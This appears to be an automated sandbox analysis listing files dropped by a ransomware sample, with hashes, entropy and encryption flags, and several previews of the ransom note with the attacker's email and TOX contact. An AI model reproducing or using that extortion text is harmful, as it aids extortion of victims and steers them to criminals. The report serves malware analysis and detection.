                                SHA1:F6653735F926634947EB765EDB74058B571F299F
                                SHA-256:519A6D1421C60000E86AEB8A66A6C69BD022BCBBDD6653B6C26F2818FF008274
                                SHA-512:809D383198D910ABD46A4CEB358DEF63D089F4BC0648ABE1261F5FAB2FECE8B776231AD5B41669F327717A5724F1DF69B08AD9520FDBFB7BC2027945CBDC46E7
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):152288
                                Entropy (8bit):7.999000054378898
                                Encrypted:true
                                SSDEEP:3072:CB3fqO7ZrbcGHeYurqjPhvwz/DeazV4FXxpSvh8ri8b0OFf+E/xRXrMphmF:CVjnpX6qbhvGbeahC4vh8jf+EJNrImF
                                MD5:B0D2F4C3E7433B02763CACF14555AC37
                                SHA1:6E7A2F74B67939295C2CBD6E5EFB75CE40D8850C
                                SHA-256:2FE6D9553D5D547CFFEF7B897E4742F23438E7A4BA3B5178BF6071EB004D0FAA
                                SHA-512:244F94E20AEBC5ECC4452127B76167BB8332B7CB40F04CBBC33D5D69C5D327DFEB2B031B81530C679BACDC189A0BE66E84DBDE540F1D55CE54856201CB55D804
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69344
                                Entropy (8bit):7.99729730135454
                                Encrypted:true
                                SSDEEP:1536:8JQikin9kIVdO+K/BaJPnLJx37JefPJ9jTHMtNMnMu+clnMNhBt3:Rin9kIV0+0ALX3Ifh9jDMtWJ/Mfv3
                                MD5:D7A09623574E8DCF2812B319BB86FBE5
                                SHA1:EC4F1C38584EF40D62A132E366362186B61B846E
                                SHA-256:01637B95E9F001AF2B664DC85307DDA1B208C33FA43DE698C1C783F490372030
                                SHA-512:3CAB907A1F9D3D13CD10A0F901D81A291475261B7C50208A4FEB475C6691BC755322B34C9150BC4E242ACDAED31B3B86987556176209B4B8725B547BD28254DF
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):448736
                                Entropy (8bit):7.742703452746421
                                Encrypted:false
                                SSDEEP:6144:D8vdlobcx94J45VGTCPqAKaVJ9/tCOjfjFLX1Luu4JUfHtMUj955JNtdgC+nlKG:DhbcxG6rPqgJ9BRtBGQFtdgjlr
                                MD5:208C15112222EA11D01738CCAB047058
                                SHA1:6DB8EB73CB54153A0F10EA58418B5FAA4CA1443A
                                SHA-256:8E61BD39CD5724A3F34018910CE2535FB6B5A115C49B6690AE12365550A03FA8
                                SHA-512:4E3A4638B45CB25B9B786378C1903D02A50B1AAC78C7BF70AAC0816C44C75EA335B37E42E63534DE85249F3D00261AD1B6C3E8A9E7A6797980F7E8840C913B87
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):32480
                                Entropy (8bit):7.993860741449151
                                Encrypted:true
                                SSDEEP:768:ybqdogMeodfu87d87VaNbTXJmbmbmcLscyLwBrDNKk:PdogroZu87dGauybAG
                                MD5:9F4EFE8BAD680F19868B775ABEC37AE2
                                SHA1:E34B7AFAD8E19CE1821FD4EA333F76450C34401E
                                SHA-256:65F8E5926EF9A99B5846349BD2B933787E73A6F1A1558CC26CD7D52813A1F975
                                SHA-512:834120B3133C4FC9C765A2F19CA2C0281EE9B2449E7A83AA3B7FE3E4CC9E2F81DAF29953178D633451E723D2BADAE33C62ADCABAA862FE0E35234CAA7CFF48BF
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29408
                                Entropy (8bit):7.9934654335168265
                                Encrypted:true
                                SSDEEP:768:5TJLgkdt3Wv9Ds1tDt/RsCu77RiEtcJmiGNIK1EnmlN+y+UH:Pn/W1Ds1PaP/gEQmiAEnmlN+H+
                                MD5:D48E9C2D736F162D5B0A5B333DBE43B0
                                SHA1:E1C9955A57DC4664DA2F31F51A05D905B4A1D8CD
                                SHA-256:2DD3769FF99BC204A1BDE905067F8571473148E4B138B2B3392AD555D2ADEF06
                                SHA-512:A02D82AE9D5D6FB3C144742A8635E2DDF3338880B2596F28CCE682989155DD76741B9CE0AC4419CEDC74ED07E8587F573AF1B9F485D77F8F40F4E20D40E21FA3
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):138976
                                Entropy (8bit):7.998712340519312
                                Encrypted:true
                                SSDEEP:3072:6jYg+qNzMnkwlWmqu1/YAQX5/0l3OIg7qdRzpN:/g+qNzMnkwlWkU1zOd/N
                                MD5:2D5F56DA2A52A98F94FCD3DF5195C5C7
                                SHA1:21EB2E8D805BA1B96086C21E5D9161EBE8E94836
                                SHA-256:7B9B9B15DBFDC71853E8E18D78E749A33E0F9311319F5F1D965171CCA451D996
                                SHA-512:A9D5F926098F5060B8B973FE6463961FE5A2342C66756DC1F9C784DBEEE071A5146516C5CE5D465FDAFDB3E06EAB790414332E2F503D6E6C2D5EEA530967DA49
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):265952
                                Entropy (8bit):7.999292482950315
                                Encrypted:true
                                SSDEEP:6144:kUSxlO77ke1gUcxOH61opWEBnOyvGDwfnIUw6LB:nSLe7kJCaqBnOyvBfPLB
                                MD5:C760023C8A9C190D35CE5E421C7794DA
                                SHA1:8384DBD108C4FBDF9C1355082330D169858B6582
                                SHA-256:9DC06096D11AE9226CC66821ECDAA1A320B4723F8FF2789743DD40F03C41E51C
                                SHA-512:6FCBA8CF26C9C848E50F17F4C261786634878CA4175FE976860354F588066F99005453F05976E6DA8CA801C4C9AA630584456779F2DCF89152BE8FEA13C3D311
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):158432
                                Entropy (8bit):7.998802284391687
                                Encrypted:true
                                SSDEEP:3072:Wu8O7fs3U3OB9jX9fmiYXsHRghDD4UE2ysKbuxcpXcuKmBGF:W9OIUeB9jX9f2XsHorE2QbuxcpMKu
                                MD5:45619959E2E026C06BF53DB08B48E46C
                                SHA1:E94A17C21C9AAB11C8043772688F579D5AFCAAEE
                                SHA-256:EACC041FB222BD19E613388B9B37B5F70B1D05F98E56AFB92EFAE8B09A18B0F0
                                SHA-512:D69A7F225071EF061FF99024AF0D642A67D40F3964143700E9B41D8036D30C90F45B098B2E3977BA2A0D2218626B8D7B7F8DDA279A63E42C07ECFD1AF743DD8B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):222944
                                Entropy (8bit):7.999122844470482
                                Encrypted:true
                                SSDEEP:6144:V3xaJZo/SAnCedPlX+jfJsnrst0QbcBOX8TOkfIoEpDsn:V3x3/SALdPMfKu5bcBBbBEl+
                                MD5:F6875B13E6C2E4B8C9B997E253732419
                                SHA1:8BA9D4F4625A1C302C1BB74A202554B29078E2AC
                                SHA-256:8BCE89FD3205C0520E47ACBD171E0277D0CE1547CEEF3BD020E3A881039954A1
                                SHA-512:E736CC4AB9F64356C06C6B03BA25279695378E2F3818F438DD280D8FD3419C0A99AAA9E25F69C77B1F227246A8205B40AFFDEDAA8D8445B43B4E18DF0E6FF7F3
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):567520
                                Entropy (8bit):7.227920723668874
                                Encrypted:false
                                SSDEEP:12288:guxkVWawfs0Qp8Juzl6GxZGwviVuedvfEnIjiHGZY4:gWkVuk0QpQuzl6MZIYed8siHGh
                                MD5:B0DC94C4ED5BC78995EECB3E1A78906C
                                SHA1:BBCDCEBA1FBE346672BD129024107E6829EE97B8
                                SHA-256:41AA3325E8332C933BB2941BE7D868BD666C353F846E3F29969344ECAB987C44
                                SHA-512:01BE4D23C976DDA3A18AEF0AC8B6482DE1C57087C1BDA8528D35C2C734FF2E3800729167B45625A7875CE9CEDA504FC51C6B3F0AB90E7511A42C52483A53BD1C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799456
                                Entropy (8bit):7.340721640492317
                                Encrypted:false
                                SSDEEP:12288:hmPXqcI0g4ZTmIb1W+V+uIGvXXpYUdRhu56+xbj8DjPL+7/rlVInor6e97oOXkGz:qS4oIb4SfHbH0b+ejrlLrFWh2Q4R
                                MD5:E27973C6ED8F58C532486483422363B7
                                SHA1:8F23C8E045D92D9E0C57AB077699EBBDB0C1AD96
                                SHA-256:D4F9AEA50E85204290C6CDD1400C40707781CF491B64EF883CABF0FFC9855DE6
                                SHA-512:FCA98EB50C2CD3FB8815AE5D2A2D26F84AFE24FA9B3D508338A13461D200F497772D55A9D356883D941016D1C134468C37798ADC6A3D30FC45F5B8234729A966
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):140000
                                Entropy (8bit):7.998696269920782
                                Encrypted:true
                                SSDEEP:3072:SoWDDUrfObRUAJvxeCz4Sx9Gpl/5XTaErOSObphuxRo:eDArOVNxe9S4XdmpkxRo
                                MD5:E2837BB33BA9ECB68329218693F681A4
                                SHA1:09BDDD4A37A499911D87CED56796B9BD4CE511E7
                                SHA-256:0E22B639B6FA3436B3BEB12469094C920F7DA3220161FC5825BD7F01C60DBBAC
                                SHA-512:1DBC132BE7EF6DD22E30A5C2758EC1230F585DECAA6008BC699909EB6AAB8C36F5190D0AF2CDE2F74153DE96ECAE4DEAB380F2B8CB6A20147E92A425C676864B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176864
                                Entropy (8bit):7.999007606637684
                                Encrypted:true
                                SSDEEP:3072:5F5NcfJ3HMN+07f4iMbFysaWChjYhh2MH+8mEQzNfCddWnPj6zpNs4vs1kWt:MRMQ24iaaZhUhhFe5OinGzXsss1kWt
                                MD5:29C410F21DC6E44873C37C7DFE8F9D87
                                SHA1:716C856419113556136C3786E2BD6F6F2EA01786
                                SHA-256:3C9F0E28E97772A54A7CAED26AD8D45743F4AEA2C87B71E7A59D3C3E4CAB3F7B
                                SHA-512:E6667C704E9166ACABB04963C8E16922515FB6B298D508266FF592E909F9ACAECBFE1C8A6E57D55301F2958E67E1D7226A0CA69784A267C60B62CDEEBAA46D78
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44768
                                Entropy (8bit):7.995653488210379
                                Encrypted:true
                                SSDEEP:768:ZWSKLK4ZXF1llXqyfhAP4N2PVayHnqCOveCMREZlpeIBD9vewoxYI8PTXnoJjfTL:ZWdLZll6ChE3zCMREZnBxe9x18LodLhB
                                MD5:3E4840663FE8DC449685AD43198DB4D8
                                SHA1:CFEC49F8F56306981B4F48C3F6E133870C21A29A
                                SHA-256:373D4578117EA9C3AC96128CFC4E989447CB0E663125DA35425D9A90C7A4213C
                                SHA-512:85984AEB17D10D3E976C9DA8437FC59623109212C5BC32501B35ECFF8927B0CC87EE1324DD772CAAB2D2F5C8617800B97A96C7B38C867FFDE3434C14B9C1E061
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):23776
                                Entropy (8bit):7.9922148082497255
                                Encrypted:true
                                SSDEEP:384:WlkwQuzC+WkZpvp3RRZGpB8H3jfUOHUmeS0u9gsH7HoiVmcsHfgSursGxhsUr/yw:sewVWkdBO8UBmeA9pDViqsgn/yw
                                MD5:B6D234B2E7339689421F21270EBC54F9
                                SHA1:12C11EAF65A44E36274FE19118B8F3D19C035762
                                SHA-256:6D68E42CB06FEFF125131FB99401E6C1C5B13C04B2B28BD471DA831AFF97D079
                                SHA-512:B052F8F2C0E0CEFA1D0FC0B8719DC84E62FEEB63F49A25298EE87F21ACEBD5EDC4E92A45D099383209149214D60A9AADB50736FDD777DA536A76C5F401DB1085
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):61152
                                Entropy (8bit):7.996887697081187
                                Encrypted:true
                                SSDEEP:1536:p1nfREn1N3KE8qQ1/hi+Vj1qMFhmX1awWkwH2MyjGtLMyf2KVXb22F:XJEn1dK3hiEjcMjwaKpGtZfLVBF
                                MD5:821B20511CFB706F9119A745582B4FBA
                                SHA1:225EFB39427DC70C1659D4057AE02FC749E57240
                                SHA-256:840A7B020C696C2EB272387E05BC7A91F5876D285A07A333C52535E7A8664400
                                SHA-512:608E5459D94883F56FE3D976F5D02A35A9B8B241B07299C7DAC50F6AAAB2386FAD9D8418C64BFE376EE7D63048F413111504B816BFA4B1C3D95FC81E85679113
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26336
                                Entropy (8bit):7.992462693697551
                                Encrypted:true
                                SSDEEP:384:vzw6j6TQh1+bKqKPD3xZZmNxRGHezZrnE/ggrMVRpgGYJMamMFjA2zBn1eabh+Vm:bZj6kOmb3TEXRG8g/lrMLydFj1dn8OP
                                MD5:61E131A98518C842CF5CCB46F011987D
                                SHA1:17DC307278E4C34D6CE74B8D84144D411F08D2F7
                                SHA-256:FEE27652166F1621BE86E02EEC1EDD178D2878CF7C8080D9001CC4618B68FFB0
                                SHA-512:930421F79370D0F971C31684FA72604F01BFC6A2F15DF5B8A49B875E1235D587206E592FF89AFDD7FADAE9399CC60CC28F2492147F564BF86E8BC40E69420624
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):192736
                                Entropy (8bit):7.9991235609400215
                                Encrypted:true
                                SSDEEP:3072:2+IMWx2NC/0EUUqQpsLC3quUOvMXCXxS5TuItfvyRon07NOr84MO5pSd7pEUHJsw:NqICzUIpscquU6xSFuItbKuMO5gdF5JF
                                MD5:F620692E971418D073313CE39A7C0456
                                SHA1:15AE28BE6E70B25DFC2B206C770A23C463813F21
                                SHA-256:6C024BD7D97651B2BC86F8BF30A3849677F3D1E09B9171E36079C207DBC9B581
                                SHA-512:B1B0D00B9DD40B3FE6EF8FA9A0B5DCD94E5AECC31ABEB5DE2716FE43DC95694FDFFAABDEE6CA2134D66577CE01337C8E9BC7D05C97ABE1539CBD79F0003EED77
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):82144
                                Entropy (8bit):7.997391316758768
                                Encrypted:true
                                SSDEEP:1536:iGS2PoB/QFGULWe54Z5OSK5tHorWKVu0FRyyJOc+3XSQ3Gy/ukT0IT:B5oB4gQX54ZYmWKkSRyuOcuHx
                                MD5:A6FC0E358F2690267B6692FADD330CB5
                                SHA1:88F0D41AF9914F48BD0A3A167CB56819385498B3
                                SHA-256:A398C30B6DE0951ACE6DB525DEA1F7BE70BDC8DB93BC02680D2EA8654ED6F8EF
                                SHA-512:5C19598C0FCDDAE3DC6598A03B262F862AE195AEFBE9A054EB88EF1C75833FAFD73D1C587555A5FE6D06376F91574F1CCBAD57A67069AC7DBEF02C9CD33B12B6
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):757
                                Entropy (8bit):7.679358658025262
                                Encrypted:false
                                SSDEEP:12:AazVw3Li1vQqOLHD5XsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWO:A+WuKjj5z/wpDyYPGTNj0hOHAVMJg6WO
                                MD5:CAC5A4971CCE9C105EED85A29EA39C34
                                SHA1:9B06873136DB07A8B926F2665471FA8C4D8CB66C
                                SHA-256:9B171B21D67172A3206BAEBC55AB8740140527A28F27EB4E7BF2CD091DFD3092
                                SHA-512:9F7F080C51E5C69167878E8D99EB0A9E9C7B0740305F94AC9CAF58D0A0A507CA6F58262DAF48AD7FF5E63420BF31977E473C9E819C98A0EC11BECA37C8F13F91
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2090
                                Entropy (8bit):7.908229248728333
                                Encrypted:false
                                SSDEEP:48:5IUXamnvvC4wBGsirnKBpY4UiXjTARxwTwV2Lp8cx/WyYu+MAVMJg6Tz:VpZwgsirKERiXvAROzrxevuAVOz
                                MD5:2DA67F3B772A06B2C0BB4D8929E8B84B
                                SHA1:8EA26C8DFC918E74B0D1B02FF3B407DFEC3C87EC
                                SHA-256:8D7AD3F3D22C3B2A7F924C60492BEEC5CCEFBCC39142FF9099CF2D3D028FA1A6
                                SHA-512:29BBFAD49C22B08176D82E0706F5D6C5E10478B9402996EFD45A3D7FC5654B97C884012D37DBD6F16B7C2C6E440C2AC7497E1B246B2625E537F3F43F1841112C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3040472
                                Entropy (8bit):7.181838696273676
                                Encrypted:false
                                SSDEEP:49152:taAiTtSBz1nEJOOUJbn2RZQVPxS7+EXdnvv8/2fo27:taAiJmzNzt72PQG3n3s2f
                                MD5:EE701AFBF3468FDC335F378E5070D004
                                SHA1:D04600DEC7FAD6636FDF6E5B4DB9E8E40270F227
                                SHA-256:41DDABA0BEC5EFCE33250AD8500C43EECCCF6F747F82DB209C3C2E4B92F39718
                                SHA-512:8657353BE742B3EB2B724FEF3B18E8611367B9615593BE891B84C292D90BE46EDDA3CF7ACF230A35A7D14916626C14D3AE0E9408384ED3A67FE96832A0E9BBD8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):84963
                                Entropy (8bit):7.997642145601273
                                Encrypted:true
                                SSDEEP:1536:pW3h/t8bGwU7Wu/z70dnDU7l3Yxz8TilOcTAArVKSoyje6YJsK4XFYB:Q3h/t847VLYpU5384aTrrf1VE
                                MD5:FE0AB951DB91111880CEF95179F01CD3
                                SHA1:0C7DFA136D0E935B9148DE7F92B1CDCA76B8472B
                                SHA-256:C7167DFACE786CE2E45F5D667283B977DBF058CBF0437F3A411E80447720E2ED
                                SHA-512:9A36CB05303B2C608C9D0989EE19D72B0A18D3C67A95BA777D5DECBD3AEEF1EA888EB8CD3A2E96E62427968238891B0D94080283CBB9C6C702073FDAD272D704
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6156
                                Entropy (8bit):7.970817282685435
                                Encrypted:false
                                SSDEEP:192:DOrkxXJXnvkM0fKeRZQVe8q2PRGI+xDD2+VOu:qreXJXXyQk8qps+VOu
                                MD5:E72DCB85914526F307FBFF100CC4FEB7
                                SHA1:810AF6545230655479D3038BE5DDF30139C16E6D
                                SHA-256:75B2100934A14590745F386F7602F404737C413D22EE4BA0D4BAC430C4FA4D76
                                SHA-512:43DEEE0DE646DD836DEB63A40B0B66EDD79D3A074ABD8C7896C32CB182E1417120FA69AB6DEA4119A51BFCFFE513FB4450FB1770AA42389B3DDAD7EE68C8770C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4780
                                Entropy (8bit):7.962269785186108
                                Encrypted:false
                                SSDEEP:96:8Vxv+yDdlKd2/iFzN+ZdUYOz7FpAVHUqFQqZJg+X18KrJ6e/y3R7evuAVOO:S+FWmz0Zvo7FyNUqFQq/g018WgeO+VOO
                                MD5:F24F5D1C4A5FA3FF74A530280E5CCB01
                                SHA1:966D74303C8BC8F31FA4F0FF4550D0976331AA8B
                                SHA-256:2C5E9331D4A538FB4B0B406690DEB227513555C69BF505B543CC2F0F55B47DE7
                                SHA-512:012D4B09CB716425DAFDD932D0D6AA28772F5E70C3736D100F1E90B0A7CF1BAA0768DD5F59650C322CB41194905BF429C60E93EC821102279C399016176AAA91
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5057623
                                Entropy (8bit):7.176136538023316
                                Encrypted:false
                                SSDEEP:49152:qSY8nhXihl3RJESJ+vH8wi7pmm6q6dlnwT6HYHNY8AFEr7eDCJtL6n:nY8ntifHd+xlnFC+DCen
                                MD5:0F54581D2339F6B7D6D6264127DAAD45
                                SHA1:97ABDAF7730DF2A4B96E29123F905E4FF8644CDB
                                SHA-256:FC07F3A6DB2391E8C6CFF1B08CC154D0A5A573D02A3B93356F473379E4B03E84
                                SHA-512:A8E8FA7025186BF58676CEB7B3F5962F0F132C3932D45207229455B154849B5039416A68245D672DFCE573073D225BACD192C5824C3D86F0E7672DCF43A7A31A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4536
                                Entropy (8bit):7.951694197960495
                                Encrypted:false
                                SSDEEP:96:Cp7/wwxmJVKSsCYJOb7PdEU6TDXzZocRogIYGkUPq2hZcevuAVOm:Cp7/wwcVKSUJYDsTD9ocjIYnkq2hC+V7
                                MD5:4AC267C53D52802C4B8F4AA92B0C9036
                                SHA1:D13458492CE1184E28E42E5D844550329FD382D0
                                SHA-256:3FE33D986B7C83DAF393A8005EDA5F5BC7B962B27881046773170BEAA073F2D0
                                SHA-512:34AFA55606A5BD2A705284CC8C6A4F802819AA4C92DB3745061803F141DD06BE66FFF726409FDE7D60EAF223CAD8F2882599E4E44EA07390996F291F4C5D9370
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):4386
                                Entropy (8bit):7.961941819748066
                                Encrypted:false
                                SSDEEP:96:PD+6mF0K0/f2knAu6BUaZVTuqghLrzarb7KcZevuAVOn:C62gl6BBZVTuqSDaH7KcZ+VOn
                                MD5:1DBB665A8B7B813F0B5F6A949DFB97E8
                                SHA1:A245F659D33137B1FE5A482DA350B8E380DE81A8
                                SHA-256:8014AC41F95D80CFCE8814FF993701D38EBCE939B1D55EFD516C48A6034B00BA
                                SHA-512:8ED3FD57159ED1D00BDF5F79B911613A84A68F362A81787CA6C055CDF2727B3A423B049289B3919188E7FFCE44537A13D7212E8E05CE3E677C907C326BD4B4B5
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11186
                                Entropy (8bit):7.982934220941608
                                Encrypted:false
                                SSDEEP:192:+NI702cN8CCWePl8Xm3KM+QDrH4V7l+OpOMZuGA3rk5jK9WK4QfUkHkhUfjpt37j:eMAePM0KNQDTO7AQO+3+8K9WKbRkSrzf
                                MD5:4FF2BDEA1A10678223B0B26106D9CF24
                                SHA1:BA9CC7C4D5EF74F984408398C061E95E3203CCF2
                                SHA-256:DA2373436906972D17404D0BDFD75E47D4839ABB954D59E30658FD891D25E44D
                                SHA-512:9CD4F026A923D1536DEE8EEEAAFFBFB1D45930D763E13128D79EFD5F796D293912666D1A2B8808FA1B9B246EC00008F59BF058003A00B8B1A57DC606F60BEA34
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14570
                                Entropy (8bit):7.987220077995155
                                Encrypted:false
                                SSDEEP:384:jiDQE9lvFW0QEDo6mP7s9UqPddlCxX63yWaJzMw+VOA:ODQElB07smwHfydp8
                                MD5:488612BC3597392B442D858A2571A396
                                SHA1:A9A63A4FFA4451D4C54152C6819D0F67E79E469F
                                SHA-256:92802D6A2D1DA0FAD81C4F7BD39CCB1CA8DA289C2A570F6ABC5D902ECFA86A31
                                SHA-512:AEE297B3526134CCAD0E8A416619011EBF2F6C0DE2E5C4A4F4AB072591F6F8949EDB00179D455B7DD5C1423FAEF56FEBF060F598B1999E483E585A314B142408
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
